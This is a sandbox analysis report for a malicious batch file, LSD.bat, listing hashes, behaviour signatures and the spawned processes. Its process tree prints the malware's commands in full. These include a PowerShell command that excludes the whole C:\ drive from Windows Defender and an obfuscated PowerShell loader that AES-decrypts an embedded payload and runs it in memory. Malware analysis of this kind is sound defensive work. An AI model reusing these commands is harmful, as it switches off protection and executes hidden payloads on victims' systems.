Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    25/08/2024, 17:21

General

  • Target

    LSD.bat

  • Size

    1.3MB

  • MD5

    a9550f1c944a4bce9df986467e8c8065

  • SHA1

    da6c3d1e0b74a372f36b757917f0e9ddbd9ef4c3

  • SHA256

    b7e0820ac8d4ca27a84814f33838a9892aaaec76f8837e791d6bad95e6259529

  • SHA512

    fa76880904d49ac990a6b1172cf4aaa71c6119c17ed8c7bf31a9922433499ba3630d554273b49467ad59678d5d348deb8d7ce55b1120b4972941609566a732ca

  • SSDEEP

    24576:IGaUv+Fjs045DPskYT2fBgr5ewKfgqVjS59G26wl9OM9g+l6xjSHWwu5:L9+yPf+VeYG2tI1QMW2z

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\LSD.bat"
    1⤵
    • Deletes itself
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2976
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3052
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
          PID:2184
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
        2⤵
          PID:2668
        • C:\Windows\system32\findstr.exe
          findstr /C:"" blacklist.txt
          2⤵
            PID:2760
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\\"
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2772
          • C:\Users\Admin\AppData\Local\Temp\LSD.bat.exe
            "LSD.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $YZrPtiYD = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\LSD.bat').Split([Environment]::NewLine);foreach ($uDpKXGuz in $YZrPtiYD) { if ($uDpKXGuz.StartsWith(':: ')) { $TsoLQbVY = $uDpKXGuz.Substring(3); break; }; };$DLhtmrSl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($TsoLQbVY);$MmDnIeCf = New-Object System.Security.Cryptography.AesManaged;$MmDnIeCf.Mode = [System.Security.Cryptography.CipherMode]::CBC;$MmDnIeCf.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$MmDnIeCf.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3UJKza9U4IyboVW3XkY78xdElsdzOf0qDcphsexgwGg=');$MmDnIeCf.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IHByTY43CTggzzH1HZVtxA==');$DUzPrnIo = $MmDnIeCf.CreateDecryptor();$DLhtmrSl = $DUzPrnIo.TransformFinalBlock($DLhtmrSl, 0, $DLhtmrSl.Length);$DUzPrnIo.Dispose();$MmDnIeCf.Dispose();$jGyEbXKQ = New-Object System.IO.MemoryStream(, $DLhtmrSl);$HlKcPZxE = New-Object System.IO.MemoryStream;$foNXcIsL = New-Object System.IO.Compression.GZipStream($jGyEbXKQ, [IO.Compression.CompressionMode]::Decompress);$foNXcIsL.CopyTo($HlKcPZxE);$foNXcIsL.Dispose();$jGyEbXKQ.Dispose();$HlKcPZxE.Dispose();$DLhtmrSl = $HlKcPZxE.ToArray();$AMliJFTS = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($DLhtmrSl);$KtZnRMID = $AMliJFTS.EntryPoint;$KtZnRMID.Invoke($null, (, [string[]] ('')))
            2⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2544

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • \Users\Admin\AppData\Local\Temp\LSD.bat.exe

          Filesize

          462KB

          MD5

          852d67a27e454bd389fa7f02a8cbe23f

          SHA1

          5330fedad485e0e4c23b2abe1075a1f984fde9fc

          SHA256

          a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

          SHA512

          327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

        • memory/2544-15-0x000000001B4E0000-0x000000001B7C2000-memory.dmp

          Filesize

          2.9MB

        • memory/2544-16-0x0000000001CB0000-0x0000000001CB8000-memory.dmp

          Filesize

          32KB

        • memory/2772-4-0x000007FEF618E000-0x000007FEF618F000-memory.dmp

          Filesize

          4KB

        • memory/2772-5-0x000000001B7D0000-0x000000001BAB2000-memory.dmp

          Filesize

          2.9MB

        • memory/2772-6-0x0000000001E70000-0x0000000001E78000-memory.dmp

          Filesize

          32KB

        • memory/2772-8-0x0000000002E3B000-0x0000000002EA2000-memory.dmp

          Filesize

          412KB

        • memory/2772-7-0x0000000002E34000-0x0000000002E37000-memory.dmp

          Filesize

          12KB

        • memory/2772-9-0x000007FEF5ED0000-0x000007FEF686D000-memory.dmp

          Filesize

          9.6MB

        • memory/2772-17-0x000007FEF5ED0000-0x000007FEF686D000-memory.dmp

          Filesize

          9.6MB